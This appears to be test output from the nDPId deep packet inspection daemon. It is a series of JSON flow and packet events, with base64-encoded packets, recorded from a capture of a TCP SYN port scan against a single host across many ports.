+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNgAACcGxJqsEAAIQA2GNIzSBd3dUoMYAAAAAGACEAAisgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsT+AAADQGxJKsEAAIQA2GNIzSCirdUoMYAAAAAGACBAAqZQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAshDcAACsGmTusEAAIQA2GNIzSBIvdUoMYAAAAAGACEAAkBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsO+EAACwG4JGsEAAIQA2GNIzSBBXdUoMYAAAAAGACBAAwegAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs79wAADMGJZasEAAIQA2GNIzSAGrdUoMYAAAAAGACEAAoJQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsp8sAACsGdaesEAAIQA2GNIzSBCXdUoMYAAAAAGACEAAkagAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsa5sAADsGodesEAAIQA2GNIzSB7TdUoMYAAAAAGACEAAg2wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs0yUAACsGSk2sEAAIQA2GNIzSDtjdUoMYAAAAAGACEAAZtwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsPsoAACgG4aisEAAIQA2GNIzSBGTdUoMYAAAAAGACBAAwKwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsjmsAACkGkQesEAAIQA2GNIzSaXjdUoMYAAAAAGACCADHFgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUoAAC0GBimsEAAIQA2GNIzSFajdUoMYAAAAAGACCAAa5wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsgfEAADMGk4GsEAAIQA2GNIzSG3HdUoMYAAAAAGACEAANHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs3ikAADgGMkmsEAAIQA2GNIzSDd\/dUoMYAAAAAGACBAAmsAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsYZEAAC8Gt+GsEAAIQA2GNIzSBErdUoMYAAAAAGACEAAkRQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsGPMAADIG\/X+sEAAIQA2GNIzSB\/ndUoMYAAAAAGACDAAklgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsISwAACoG\/UasEAAIQA2GNIzTHwLdU4MZAAAAAGACDAANigAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAs7lAAACgGMiKsEAAIQA2GNIzTAE\/dU4MZAAAAAGACBAA0PQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAss2wAADYGXwasEAAIQA2GNIzTEVzdU4MZAAAAAGACDAAbMAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsgd0AACsGm5WsEAAIQA2GNIzTKYTdU4MZAAAAAGACEAD\/BwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAAC4GfTCsEAAIQA2GNIzTIALdU4MZAAAAAGACDAAMigAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsbe0AADkGoYWsEAAIQA2GNIzTAN7dU4MZAAAAAGACCAAvrgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsKzEAAC0G8EGsEAAIQA2GNIzTDOTdU4MZAAAAAGACCAAjqAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAslAAAACgGjHKsEAAIQA2GNIzTF3fdU4MZAAAAAGACBAAdFQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAspNwAACUGfpasEAAIQA2GNIzT\/G\/dU4MZAAAAAGACCAA0HAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 